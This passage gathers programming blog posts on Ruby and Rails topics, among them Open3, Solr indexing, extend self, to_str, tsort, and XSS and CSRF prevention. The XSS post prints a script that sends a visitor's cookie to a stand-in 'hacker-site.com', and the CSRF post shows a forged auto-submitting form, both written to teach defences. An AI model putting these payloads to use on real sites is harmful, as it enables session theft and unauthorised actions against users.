In the above case you will get the output of ping on your terminal as if you had typed ping www.google.com on your terminal .

Now let’s see how to check if command succeeded or not.

require 'open3'
cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  exit_status = wait_thr.value
  unless exit_status.success?
    abort "FAILED !!! #{cmd}"
  end
end

popen2e

popen2e is similar to popen3 but merges the standard output and standard error .

require 'open3'
cmd = 'ping www.google.com'
Open3.popen2e(cmd) do |stdin, stdout_err, wait_thr|
  while line = stdout_err.gets
    puts line
  end

  exit_status = wait_thr.value
  unless exit_status.success?
    abort "FAILED !!! #{cmd}"
  end
end

In all other areas this method works similar to popen3 .

Process.spawn

Kernel.spawn executes the given command in a subshell. It returns immediately with the process id.

irb(main)> pid = Process.spawn("ls -al")
=> 81001

Redirect to www for heroku with SSL

If you are using heroku and if you have enabled https then site must be redirected to use www . It means all Rails applications should ensure that “no-www” urls are redirected to “www”.

In Rails3 it is pretty easy to do. Here is how it can be done.

Bigbinary::Application.routes.draw do

  constraints(:host => /^bigbinary.com/) do
    root :to => redirect("http://www.bigbinary.com")
    match '/*path', :to => redirect {|params| "http://www.bigbinary.com/#{params[:path]}"}
  end

end

Solr, Sunspot, Websolr and Delayed job

Solr is an open source search platform from Apache. It has a very powerful full-text search capability among other things.

Solr is written in Java. And it runs as a standalone search server within a servlet container like Tomcat. When you are working on a Ruby on Rails application you do not want to maintain Tomcat server. This is where websolr comes in picture. Websolr manages the index and the Rails application interacts with index using a gem called sunspot-rails .

Getting started

# Gemfile
gem 'sunspot_rails', '= 1.3.3' # search feature

Here I am interested in searching products.

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
end

Using sunspot gem

rails g sunspot_rails:install

Above command creates config/sunspot.yml file. By default this file looks like following.

production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING

development:
  solr:
    hostname: localhost
    port: 8982
    log_level: INFO

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: WARNING

The way sunspot works is that after every single web request it updates solr about the changes that took place in the request. This is not desirable. To turn that off add auto_commit_after_request option to false in the config/sunsunspot.yml file.

I would also change the log_level for development to DEBUG . The revised config/sunspot.yml file would look like

production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING
    auto_commit_after_request: false

development:
  solr:
    hostname: localhost
    port: 8980
    log_level: DEBUG
    auto_commit_after_request: false

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: DEBUG
    auto_commit_after_request: false

Taking care of callbacks

In the above case anytime I create, update or destroy a product then as part of after_save callback solr commit commands are issued. Since after_save callbacks are part of ActiveRecord transaction, this slows up the create, update and destroy operation. I like all these operations to happen in background.

Here is how I handled it

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50
  handle_asynchronously :remove_from_index, queue: 'indexing', priority: 50
end

In the above case I used Delayed Job but you can use any background job processing tool.

In case of Delayed Job the higher the priority value the less is the priority. By bumping the priority value to 50, I’m making sure that emails and other background jobs are processed before solr work is taken up.

Problem with remove_from_index

In the above case the call to remove_from_index has been deferred to Delayed Job. However the record has already been destroyed. So when Delayed Job takes up the work it first tries to retrieve the record. However the record is missing and the background job fails.

Here is how we solved this problem.

class Product < ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50

  def remove_from_index_with_delayed
    Delayed::Job.enqueue RemoveIndexJob.new(record_class: self.class.to_s, attributes: self.attributes), queue: 'indexing', priority: 50
  end
  alias_method_chain :remove_from_index, :delayed
end

Add another worker named remove_index.rb .

class RemoveIndexJob < Struct.new(:options)
  def perform
    return if options.nil?
    options.symbolize_keys!
    record = options[:record_class].constantize.new options[:attributes].except("id")
    record.id = options[:attributes]["id"]
    record.remove_from_index_without_delayed
  end
end

Connecting to websolr

From the websolr documentation it was not clear that the sunspot gem first looks for an environment variable called WEBSOLR_URL and if that envrionment variable has a value then sunspot assumes that the solr index is at that url. If no value is found then it assumes that it is dealing with local solr instance.

So if you are using websolr then make sure that your application has environment variable WEBSOLR_URL properly configured in staging and in production environment.

Test factories first

In blog thoughtbot team outlined how they test their factories first. I like this approach. Since we prefer using minitest here is how we implemented it. It is similar to how the thoughtbot blog has described. However I still want to blog about it so that in our other projects we can use similar approach.

First under spec directory create a file called factories_spec.rb . Here is how our file looks.

require File.expand_path(File.dirname(__FILE__) + '/spec_helper')

describe FactoryGirl do
  EXCEPTIONS = %w(base_address base_batch bad_shipping_address shipping_method_rate bad_billing_address)
  FactoryGirl.factories.each do |factory|
    next if EXCEPTIONS.include?(factory.name.to_s)
    describe "The #{factory.name} factory" do

      it 'is valid' do
        instance = build(factory.name)
        instance.must_be :valid?
      end
    end
  end
end

Next I need to tell rake to always run this test file first.

When rake command is executed then it goes through all the .rake and loads them. So all we need to do is to create a rake file called factory.rake and put this file under lib/tasks .

desc 'Run factory specs.'
Rake::TestTask.new(:factory_specs) do |t|
  t.pattern = './spec/factories_spec.rb'
end

task test: :factory_specs

Here a dependency is being added to test . And if factory test fails then dependency is not met and the main test suite will not run.

That’s it. Now each unit test does not need to test factory first. All factories are getting tested here.

Classes are for designers. data-behavior is for JavaScript developers.

I have written a lot of JavaScript code like this

$(".product_pictures .actions .delete").on "click", ->
  do_something_useful

The problem with above code is that class names in the html markup was meant for web design. By using css class for functional work, I have made both the design team and the front end development team perpetually terrified of making any change.

Class is meant for CSS

If designer wants to change markup from

<div class='first actions'>xxx<div>

to

<div class='first actions-items'>xxx<div>

they are not too sure what JavaScript code might break. So they work around it.

Same goes for JavaScript developers. They do not want to unintentionally remove a class element otherwise the web design might get messed up.

There has to be a better way which clearly separates the design elements from the functional elements.

data-behavior to the rescue

Nick Quaranto of 37Signals presented Code spelunking in the All New Basecamp in video.

In his presentation he mentioned data-behavior .

data-behavior usage can be best understood by an example.

# no data-behavior
$(".product_pictures .actions .delete").on("click", function(){});
# code with data-behavior
$('[data-behavior~=delete-product-picture]').on('click', function(){});

# Another style with the same effect
$(document).on('click',"[data-behavior~=delete-product-picture]",  function(){ });

The html markup will change from

 <%= link_to '#', class: 'delete', "data-action-id" => picture.id do %>

to

<%= link_to '#', class: 'delete', "data-action-id" => picture.id, 'data-behavior' => 'delete-product-picture' do %>

Above code would produce html looking something like this

<a class="delete" data-action-id="" data-behavior="delete-product-picture" href="#">
  <button>Delete</button>
</a>

Now in the above case the designer can change the css class as desired and it will have no impact on JavaScript functionality.

More usage of data-behavior

Based on this data-behavior approach I changed some part of nimbleShop to use data-behavior. Here is the commit.

data-behavior is a very simple and effective tool to combat the problem of having clear separation between designer elements and JavaScription functional work.

Code snippet for reference

Over the period of time we have used this technique in many projects successfully. However sometimes I need to spend a while to find the right way to add data-behavior. I’m adding some code snippet so that I can find them here when I need them.

%div{ class: "", "data-behavior" => "search-container" }

.div{ data: { behavior: 'search-container' }, style: "" }

= button_tag '×', :class => "", "data-behavior" => "search-container"

= link_to 'Edit', "#",
                  data:{ behavior: 'display-in-modal', url: '' },
                  class: ""

= f.check_box :include_annual_workplan,
              'data-behavior' => 'input-include-workplan'

= f.text_area :content, placeholder: "",
                        class: '',
                        data: { behavior: "comment-content" }

= f.text_field :name, class: '',
                      'data-behavior' => 'input-client-name'

= form_for '', data: { remote: true, behavior: 'add-comment-form' } do |f|

emberjs mixin

emberjs has mixin feature which allows code reuse and keep code modular. It also support _super() method.

mixin using apply

m = Ember.Mixin.create({
  skill: function() {
    return 'JavaScript & ' + this._super()
  }
});
main = { skill: function(){ return 'Ruby' }}
o  = m.apply(main);
console.log(o.skill());

result: JavaScript & Ruby

mixin in create and extend

Now lets see usage of mixin in create and extend. Since create and extend work similarly I am only going to discuss create scenario .

skillJavascript = Ember.Mixin.create({
  skill: function() { return 'JavaScript '}
});
main = { skill: function() { return 'Ruby & ' + this._super(); } }
p = Ember.Object.create(skillJavascript, main )
console.log(p.skill())

result: Ruby & JavaScript

Notice that in the first case the mixin code was executed first. In the second case the mixin code was execute later.

Here is how it works

Here is mergeMixins code which accepts the mixins and the base class. In the first case the mixins list is just the mixin and the base class is the main class.

At run time all the mixin properties are looped through. In the first case the mixin m has a property called skill .

m.mixins[0].properties.skill

function () {
    return 'JavaScript & ' + this._super()
  }

Runtime detects that both mixin and the base class has a property called skill . Since base class has the first claim to the property a call is made to link the _super of the second function to the first function.

That works is done by wrap function.

So at the end of the execution the mixin code points to base code as _super.

It reveres itself in case of create

In the second case the mixin skillJavaScript and the main are the mixins to base class of Class. The mixin is the first in the looping order. So the mixin has the first claim to key skill since it was unclaimed by base class to begin with.

Next comes the main function and since the key is already taken the wrap function is used to map _super of main to point to the mixin .

Remember in Create and Extend it is the last one that executes first

Here is an example with two mixins.

skillHaskell = Ember.Mixin.create({
  skill: function() { return 'Haskell' }
});
skillJavascript = Ember.Mixin.create({
  skill: function() { return 'JavaScript & ' + this._super() }
});
p = Ember.Object.create(skillHaskell, skillJavascript, { skill: function(){ return 'Ruby & ' + this._super(); } } )
console.log(p.skill())

result: Ruby & JavaScript & Haskell

In this case the haskell mixin first claimed the key. So the javascript mixin’s _super points to haskell and the main code’s _super points to Javascript.

Embjers makes good use of mixin

emberjs has features like comparable, freezable, enumerable, sortable, observable. Take a look at this to checkout their code.

extend self in ruby

Following code was tested with ruby 1.9.3 .

Class is meant for both data and behavior

Lets look at this ruby code.

class Util
  def self.double(i)
   i*2
  end
end

Util.double(4) #=> 8

Here we have a Util class. But notice that all the methods on this class are class methods. This class does not have any instance variables. Usually a class is used to carry both data and behavior and ,in this case, the Util class has only behavior and no data.

Similar utility tools in ruby

Now to get some perspective on this discussion lets look at some ruby methods that do similar thing. Here are a few.

require 'base64'
Base64.encode64('hello world') #=> "aGVsbG8gd29ybGQ=\n"

require 'benchmark'
Benchmark.measure { 10*2000 }

require 'fileutils'
FileUtils.chmod 0644, 'test.rb'

Math.sqrt(4) #=> 2

In all the above cases the class method is invoked without creating an instance first. So this is similar to the way I used Util.double .

However lets see what is the class of all these objects.

Base64.class #=> Module
Benchmark.class #=> Module
FileUtils.class #=> Module
Math.class #=> Module

So these are not classes but modules. That begs the question why the smart guys at ruby-core implemented them as modules instead of creating a class the way I did for Util.

Reason is that Class is too heavy for creating only methods like double. As we discussed earlier a class is supposed to have both data and behavior. If the only thing you care about is behavior then ruby suggests to implement it as a module.

extend self is the answer

Before I go on to discuss extend self here is how my Util class will look after moving from Class to Module.

module Util
  extend self

  def double(i)
    i * 2
  end
end

puts Util.double(4) #=> 8

So how does extend self work

First lets see what extend does.

module M
 def double(i)
  i * 2
 end
end

class Calculator
  extend M
end
puts Calculator.double(4)

In the above case Calculator is extending module M and hence all the instance methods of module M are directly available to Calculator.

In this case Calculator is a class that extended the module M. However Calculator does not have to be a class to extend a module.

Now lets try a variation where Calculator is a module.

module M
 def double(i)
  i * 2
 end
end

module Calculator
  extend M
end
puts Calculator.double(4) #=> 8

Here Calculator is a module that is extending another module.

Now that we understand that a module can extend another module look at the above code and question why module M is even needed. Why can’t we move the method double to module Calculator directly. Let’s try that.

module Calculator
  extend Calculator

   def double(i)
    i * 2
   end
end
puts Calculator.double(4) #=> 8

I got rid of module M and moved the method double inside module Calculator. Since module M is gone I changed from extend M to extend Calculator.

One last fix.

Inside the module Calculator what is self. self is the module Calculator itself. So there is no need to repeat Calculator twice. Here is the final version

module Calculator
  extend self

   def double(i)
    i * 2
   end
end
puts Calculator.double(4) #=> 8

Converting A Class into a Module

Everytime I would encounter code like extend self my brain will pause for a moment. Then I would google for it. Will read about it. Three months later I will repeat the whole process.

The best way to learn it is to use it. So I started looking for a case to use extend self. It is not a good practice to go hunting for code to apply an idea you have in your mind but here I was trying to learn.

Here is a before snapshot of methods from Util class I used in a project.

class Util
  def self.config2hash(file); end
  def self.in_cents(amount); end
  def self.localhost2public_url(url, protocol); end
end

After using extend self code became

module Util
  extend self

  def config2hash(file); end
  def in_cents(amount); end
  def localhost2public_url(url, protocol); end
end

Much better. It makes the intent clear and ,I believe, it is in line with the way ruby would expect us to use.

Another usage inline with how Rails uses extend self

Here I am building an ecommerce application and each new order needs to get a new order number from a third party sales application. The code might look like this. I have omitted the implementation of the methods because they are not relevant to this discussion.

class Order
  def amount; end
  def buyer; end
  def shipped_at; end
  def number
    @number || self.class.next_order_number
  end

  def self.next_order_number; 'A100'; end
end

puts Order.new.number #=> A100

Here the method next_order_number might be making a complicated call to another sales system. Ideally the class Order should not expose method next_order_number . So we can make this method private but that does not solve the root problem. The problem is that model Order should not know how the new order number is generated. Well we can move the method next_order_number to another Util class but that would create too much distance.

Here is a solution using extend self.

module Checkout
  extend self

  def next_order_number; 'A100'; end

  class Order
    def amount; end
    def buyer; end
    def shipped_at; end
    def number
      @number || Checkout.next_order_number
    end
  end
end

puts Checkout::Order.new.number #=> A100

Much better. The class Order is not exposing method next_order_number and this method is right there in the same file. No need to open the Util class.

To see practical examples of extend self please look at Rails source code and search for extend self. You will find some interesting usage.

This is my first serious attempt to learn usage of extend self so that next time when I come across such code my brain does not freeze. If you think I have missed out something then do let me know.

to_str in ruby

Following code was tested with ruby 1.9.3 .

All objects have to_s method

to_s method is define in Object class and hence all ruby objects have method to_s.

Certain methods always call to_s method. For example when we do string interpolation then to_s method is called. puts invokes to_s method too.

class Lab
 def to_s
  'to_s'
 end
 def to_str
  'to_str'
 end
end

l = Lab.new
puts "#{l}" #=> to_s
puts l #=> to_s

to_s is simply the string representation of the object.

Before we look at to_str let’s see a case where ruby raises error.

e = Exception.new('not sufficient fund')

# case 1
puts e

# case 2
puts "notice: #{e}"

# case 3
puts "Notice: " + e

Here is the result

not sufficient fund
Notice: not sufficient fund
`+': can't convert Exception into String (TypeError)

In the first two cases the to_s method of object e was printed.

However in case ‘3’ ruby raised an error.

Let’s read the error message again.

`+': can't convert Exception into String (TypeError)

In this case on the left hand side we have a string object. To this string object we are trying to add object e. Ruby could have called to_s method on e and could have produced the result. But ruby refused to do so.

Ruby refused to do so because it found that the object we are trying to add to string is not of type String. When we call to_s we get the string representation of the string. But the object might or might not be behaving like a string.

Here we are not looking for the string representation of e. What we want is for e to behave a like string. And that is where to_str comes in picture. I have a few more examples to clear this thing so hang in there.

What is to_str

If an object implements to_str method then it is telling the world that my class might not be String but for all practical purposes treat me like a string.

So if we want to make exception object behave like a string then we can add to_str method to it like this.

e = Exception.new('not sufficient fund')

def e.to_str
  to_s
end

puts "Notice: " + e #=> Notice: not sufficient fund

Now when we run the code we do not get any exception.

What would happen if Fixnum has to_str method

Here is an example where ruby raises exception.

i = 10
puts '7' + i #=> can't convert Fixnum into String (TypeError)

Here Ruby is saying that Fixnum is not like a string and it should not be added to String.

We can make Fixnum to behave like a string by adding a to_str method.

class Fixnum
  def to_str
    to_s
  end
end
i = 10
puts '7' + i #=> 710

The practical usage of this example can be seen here.

irb(main):002:0> ["hello", "world"].join(1)
TypeError: no implicit conversion of Fixnum into String

In the above case ruby is refusing to invoke to_s on “1” because it knows that adding “1” to a string does not feel right.

However we can add method to_str to Fixnum as shown in the last section and then we will not get any error. In this case the result will be as shown below.

irb(main):008:0> ["hello", "world"].join(1)
=> "hello1world"

A real practical example of defining to_str

I tweeted about a quick lesson in to_s vs to_str and a few people asked me to expand on that. Lets see what is happening here.

Before the refactoring was done Path is a subclass of String. So it is String and it has all the methods of a string.

As part of refactoring Path is no longer extending from String. However for all practical purposes it acts like a string. This line is important and I am going to repeat it. For all practical purposes Path here is like a String.

Here we are not talking about the string representation of Path. Here Path is so close to String that practically it can be replaced for a string.

So in order to be like a String class Path should have to_str method and that’s exactly what was done as part of refactoring.

During discussion with my friends someone suggested instead of defining to_str tenderlove could have just defined to_s and the result would have been same.

Yes the result would be same whether you have defined to_s or to_str if you doing puts.

puts Path.new('world')

However in the following case just defining to_s will cause error. Only by having to_str following case will work.

puts 'hello ' + Path.new('world')

So the difference between defining to_s and to_str is not just what you see in the output.

Conclusion

If a class defines to_str then that class is telling the world that although my class is not String you can treat me like a String.

jquery-ujs and jquery trigger

Let’s see how to make AJAX call using jquery.

jQuery’s ajax method’s success callback function takes three parameters. Here is the api .

success(data, textStatus, jqXHR)

So if you are making ajax call using jQuery the code might look like

$.ajax({
  url: 'ajax/test.html',
  success: function(data, textStatus, jqXHR) {
    console.log(data);
  }
});

ajax using jquery-ujs

If you are using Rails and jquery-ujs then you might have code like this

<a href="/users/1" data-remote="true" data-type="json">Show</a>
$('a').bind('ajax:success', function(data, status, xhr) {
  alert(data.name);
});

Above code will not work. In order to make it work the very first element passed to the callback must be an event object. Here is the code that will work.

$('a').bind('ajax:success', function(event, data, status, xhr) {
  alert(data.name);
});

Remember that jQuery api says that the first parameter should be “data” then why we need to pass event object to make it work.

Why event object is needed

Here is snippet from jquery-ujs code

success: function(data, status, xhr) {
  element.trigger('ajax:success', [data, status, xhr]);
}

The thing about trigger method is that the event object is always passed as the first parameter to the event handler. This is why when you are using jquery-ujs you have to have the first parameter in the callback function an event object.

XSS and Rails

XSS is consistently a top web application security risk as per The Open Web Application Security Project (OWASP) .

XSS vulnerability allows hacker to execute JavaScript code that hacker has put in.

Most web applications has a form. User enters <script>alert(document.cookie)</script> in address field and hits submit. If user sees a JavaScript alert then it means user can execute the JavaScript code that user has put in. It means site has XSS vulnerability.

Almost all modern web applications have some JavaScript code. And the application executes JavaScript code. So running JavaScript code is not an issue. The issue is that in this case hacker is able to put in JavaScript code and then hacker is able to run that code. No one should be allowed to put their JavaScript code into the application.

If a hacker can execute JavaScript code then the hacker can see some other persons’ cookie. Later we will see how hacker can do that.

If you are logged into an application then that application sets a cookie. That is how the application knows that you are logged in.

If a hacker can see someone else’s cookie then the hacker can log in as that person by stealing cookie.

Having SSL does not protect site from XSS vulnerability.

XSS stands for Cross-site scripting. It is a very misleading name because XSS has absolutely nothing to do with cross-site. It has everything to do with a site, any site.

A practical example

It is very common to display address in a formatted way. Usually the code is something like this.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />')

When developer looks at the html page developer will see something like this.

xss

<br /> tag is literally shown on the screen. Developer looks at the html markup rendered by Rails and it looks like this

xss

So the developer comes back to code and marks the string html_safe as shown below.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('<br />').html_safe

Now the browser renders the address with proper <br /> tag and the address looks nicely formatted as shown below.

xss

The developer is happy and the developer moves on.

However notice that developer has marked user input data like address1 as html_safe and that’s dangerous.

Hacker in action

The application has a number of users and everything is running smoothly. All the users are seeing properly formatted address. And then one day a hacker tried to hack the site. The hacker puts in address1 as <script>alert(document.cookie)</script>.

Now the hacker will see a JavaScript alert which might look like this.

xss

If we look at the html markup then the html might look like this.

John Smith<br /><script>alert(document.cookie)</script><br />Suite #110
<br />Miami<br />FL<br />33027<br />USA

Hacker had put in <script> and the application sent that code to browser. Browser did its job. It executed the JavaScript code and in the process hacker is able to see the cookie.

How would hacker steal someone else’s information.

Let’s say that an application has a comment form. In the comment form hacker puts in comment as following.

<script> window.location='http://hacker-site.com?cookie='+document.cookie </script>

Next day another user,Mary, comes to the site and logs in. She is reading the same post and that post has a lot of comments and one of the comments is comment posted by the hacker.

The application loads all the comments including the comment posted by the hacker.

When browser sees JavaScript code then browser executes it. And now Mary’s cookie information has been sent to hacker-site and Mary is not even aware of it.

This is a classic case of XSS attack and this is how hacker can next time login as Mary just by using her cookie information.

Fixing XSS

Now that we know how hacker might be able to execute JavaScript code on our application question is how do we prevent it.

Well there is only way to prevent it. And that is do not send <script> tag to the browser. If we send <script> tag to the browser then browser will execute that JavaScript.

So what can we do so that <script> tag is not sent to the browser.

Rails default behavior is to keep things secure

Before we start looking at solutions lets revisit what happened when earlier we did not mark content as html_safe. So let’s remove html_safe and lets try to see the content posted by the hacker.

So the code without html_safe would look like this.

array = [name, address1, address2, city_name state_name, zip, country_name]
array.compact.join('<br />')

And if we execute this code then hackers address would look like this.

John Smith<br /><script>alert(document.cookie)</script><br />Suite #110<br />Miami<br />FL<br />33027<br />USA

Notice that in this case no JavaScript alert was seen. Hacker gets to see the address hacker had posted. Why is that. To answer that let’s look at the html markup.

John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;
br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA

As we can see Rails did not render the address exactly as it was posted by the hacker. Rails did something because of which <script> turned into &lt;script&gt;.

Rails html escaped the content by using method html_escape.

By default Rails assumes that all content is not safe and thus Rails subjects all content to html_escape method.

Problem is that here we are trying to format the content using <br /> and Rails is escaping that also. We need to escape only the user content and not escape <br />. Here is how we can do that.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ERB::Util.html_escape(i) }.join('<br />').html_safe

In the above case we are marking the content as html_safe because we subjected the content through html_escape and now we are sure that no unescaped user content can go through.

This will show address in the browser like this.

xss

Above solution worked. <br /> is not escaped and user input was properly escaped.

Another solution using content_tag

In the above case we used html_escape and it worked. However if we need to add say <strong> tag then adding the opening tag and then closing tag could be quite cumbersome. For such cases we can use content_tag

By default content_tag escapes the input text.

array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map{ |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe

simple_format for simple formatting

If you want to format the text a little bit then you can use simple_format . If user enters a bunch of text in text area then simple_format can help make the text look pretty without compromising security. It will strip away <script> and security sensitive tags. html_escape internally uses sanitize method. Note that simple_format will remove script tag while solutions like html_escape will preserve script tag in escaped format.

Handling JSON data

We use jbuilder and view looks like this.

json.user do
  json.name @user.name
  json.address1 @user.address1
  json.address2 @user.address2
  json.city_name @user.city_name
  json.state_name @user.state_name
  json.zip @user.zip
  json.country_name @user.country_name
end

This will produce JSON structure as shown below.

xss

On the client side there is JavaScript code to display the content. $('body').append(data.about) does the job. Well when that content is added to DOM then browser will execute JavaScript code and now we are back to the same problem.

There are two ways we can handle this problem. We can send the data as it is in JSON format. Then it is a responsibility of client side JavaScript code to append data in such a way that html tags like script are not executed.

jQuery provides text(input) method which escapes input value. Here is an example.

jquery text

In this case the entire responsibility of escaping the content rests on JavaScript. While using the data JavaScript code constantly needs to be aware of which content is user input and must be escaped and which content is not user input.

That is why we favor the solution where JSON content is escaped to begin with. For escaping the content we can use h or html_escape helper method.

json.user do
  json.name h(@user.name)
  json.address1 h(@user.address1)
  json.address2 h(@user.address2)
  json.city_name h(@user.city_name)
  json.state_name h(@user.state_name)
  json.zip h(@user.zip)
  json.country_name h(@user.country_name)
end

xss

As you can see the user content is escaped. Now this data can be sent to client side and we do not need to worry about script tag being executed.

CSRF and Rails

CSRF stands for Cross-site request forgery. It is a technique hackers use to hack into a web application.

Unlike XSS CSRF does not try to steal your information to log into the system. CSRF assumes that you are already logged in at your site and when you visit say comments section of some other site then an attack is done on your site without you knowing it.

Here is how it might work.

  • You log in at www.mysite.com .
  • Now you open a new tab and you are visiting www.gardening.com since you are interested in gardening.
  • You are browsing the comments posted on the gardening.com forum. One of the comments posted has url which has source like this <img src="http://www.mysite.com/grant_access?user_id=1&project_id=123" />
  • Now if you are the admin of the project “123” in www.mysite.com then unknowingly you have granted admin access to user 1. And you did not even know that you did that.

I know you are thinking that loading an image will make a GET request and granting access is hidden behind POST request. So you are safe. Well the hacker can easily change code to make a POST request. In that case the code might look like this

<script>
 var url = "http://mysite.com/grant_access?user_id=1&project_id=123";
 document.write('<form name=hack method=post action='+url+'></form>')
</script>
<img src='' onLoad="document.hack.submit()" />

Now when the image is loaded then a POST request is sent to the server and the application might grant access to this new user. Not good.

Prevention

In order to prevent such things from happening Rails uses authenticity_token.

If you look at source code of any form generated by Rails you will see that form contains following code

<input name="authenticity_token"
       type="hidden"
       value="LhT7dqqRByvOhJJ56BsPb7jJ2p24hxNu6ZuJA+8l+YA=" />

The exact value of the authenticity_token will be different for you. When form is submitted then authentication_token is submitted and Rails checks the authenticity_token and only when it is verified the request is passed along for further processing.

In a brand new rails application the application_controller.rb has only one line.

class ApplicationController < ActionController::Base
  protect_from_forgery
end

That line protect_from_forgery checks for the authentication of the incoming request.

Here is code that is responsible for generating csrf_token.

# Sets the token value for the current session.
def form_authenticity_token
  session[:_csrf_token] ||= SecureRandom.base64(32)
end

Since this csrf_token is a random value there is no way for hacker to know what the “csrf_token” is for my session. And hacker will not be able to pass the correct “authenticity_token”.

Do keep in mind that this protection is applied only to POST, PUT and DELETE requests by Rails. Rails states that GET should not be changing database in the first place so no need for check for authenticity of the token.

Update for Rails 4

If you generate a brand new Rails application using Rails 4 then the application_controller.rb would look like this

class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery with: :exception
end

Now the default value is to raise an exception if the token is not matched. The API calls will not have the token. If the application is expecting api calls then the strategy should be changed from :exception to :null_session.

Note that if the site is vulnerable to XSS then the hacker submits request as if he is logged in and in that case the CSRF attack will go through.

tsort in ruby and rails initializers

You have been assigned the task of figuring out in what order following tasks should be executed given their dependencies on other tasks.

Task11 takes input from task5 and task7.
Task10 takes input from task11 and task3.
Task9 takes input from task8 and task11.
Task8 takes input from task3 and task7.
Task2 takes input from task11.

If you look at these tasks and draw a graph then it might look like this.

directed acyclic graph

Directed acyclic graph

The graph shown above is a “Directed acyclic graph” . In Directed acyclic graphs if you start following the arrow then you should never be able to get to the node from where you started.

Directed acyclic graphs are great at describing problems where a task is dependent on another set of tasks.

We started off with a set of tasks that are dependent on another set of tasks. To get the solution we need to sort the tasks in such a way that first task is not dependent on any task and the next task is only dependent on task previously done. So basically we need to sort the directed acyclic graph such that the prerequisites are done before getting to the next task.

Sorting of directed acyclic graph in the manner described above is called topological sorting .

TSort

Ruby provides TSort which allows us to implement “topological sorting”. Here is source code or tsort .

Lets write code to find solution to the original problem.

require "tsort"

class Project
  include TSort

  def initialize
    @requirements = Hash.new{|h,k| h[k] = []}
  end

  def add_requirement(name, *requirement_dependencies)
    @requirements[name] = requirement_dependencies
  end

  def tsort_each_node(&block)
    @requirements.each_key(&block)
  end

  def tsort_each_child(name, &block)
    @requirements[name].each(&block) if @requirements.has_key?(name)
  end

end

p = Project.new
p.add_requirement(:r11, :r5, :r2)
p.add_requirement(:r10, :r11, :r3)
p.add_requirement(:r9, :r8, :r11)
p.add_requirement(:r8, :r3, :r7)

puts p.tsort

If I execute above code in ruby 1.9.2 I get following result.

r5
r2
r11
r3
r10
r7
r8
r9

So that is the order in which tasks should be executed .

How Tsort works

tsort requires that following two methods must be implemented.

#tsort_each_node - as the name suggests it is used to iterate over all the nodes in the graph. In the above example all the requirements are stored as a hash key . So to iterate over all the nodes we need to go through all the hash keys. And that can be done using #each_key method of hash.

#tsort_each_child - this method is used to iterate over all the child nodes for the given node. Since this is directed acyclic graph all the child nodes are the dependencies. We stored all the dependencies of a project as an array. So to get the list of all the dependencies for a node all we need to do is @requirements[name].each.

Another example

To make things clearer lets try to solve the same problem in a different way.

require "tsort"

class Project
  attr_accessor :dependents, :name
  def initialize(name)
    @name = name
    @dependents = []
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&block)
    @col.each(&block)
  end

  def tsort_each_child(project, &block)
    @col.select { |i| i.name == project.name }.first.dependents.each(&block)
  end
end

r5 = Project.new :r5
r2 = Project.new :r2

r11 = Project.new :r11
r11.dependents << r5
r11.dependents << r2

r3 = Project.new :r3
r10 = Project.new :r10
r10.dependents << r11
r10.dependents << r3

r8 = Project.new :r8
r9 = Project.new :r9
r9.dependents << r8
r9.dependents << r11

r7 = Project.new :r7
r8.dependents << r3
r8.dependents << r7

col = [r5, r2, r11, r3, r10, r9, r7, r8, r5]

result = Sorter.new(col).tsort
puts result.map(&:name).inspect

When I execute the above code this is the result I get

[:r5, :r2, :r11, :r3, :r10, :r7, :r8, :r9]

If you look at the code here I am doing exactly the same thing as in the first case.

Using before and after option

Let’s try to solve the same problem one last time using before and after option. Here is the code.

require "tsort"

class Project
  attr_accessor :before, :after, :name
  def initialize(name, options = {})
    @name = name
    @before, @after = options[:before], options[:after]
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&block)
    @col.each(&block)
  end

  def tsort_each_child(project, &block)
    @col.select { |i| i.before == project.name || i.name == project.after }.each(&block)
  end
end

r11 = Project.new :r11
r7 = Project.new :r7
r9 = Project.new :r9
r5 = Project.new :r5
r2 = Project.new :r2, after: :r5, before: :r11
r3 = Project.new :r3, after: :r11
r8 = Project.new :r8, after: :r7, before: :r9
r10 = Project.new :r10, before: :r7

col = [r5, r2, r11, r3, r10, r9, r7, r8, r5]

result = Sorter.new(col).tsort
puts result.map(&:name).inspect

Here is the result.

[:r5, :r2, :r11, :r3, :r10, :r7, :r8, :r9]

Sorting of rails initializer

If you have written a rails plugin then you can use code like this

initializer 'my_plugin_initializer',after: 'to_prepare', before: 'before_eager_load' do |app|
 ....
end

The way rails figures out the exact order in which initializer should be executed is exactly same as I illustrated above. Here is the code from rails.

alias :tsort_each_node :each
def tsort_each_child(initializer, &block)
  select { |i| i.before == initializer.name || i.name == initializer.after }.each(&block)
end
............
............
initializers.tsort.each do |initializer|
  initializer.run(*args) if initializer.belongs_to?(group)
end

When Rails boots it invokes a lot of initializers. Rails uses tsort to get the order in which initializers should be invoked. Here is the list of unsorted initializers. After sorting the initializers list is this .

Where else it is used

Bundler uses tsort to find the order in which gems should be installed.

Tsort can also be used to statically analyze programming code by looking at method dependency graph.

Image source: http://en.wikipedia.org/wiki/Directed_acyclic_graph

alias vs alias_method

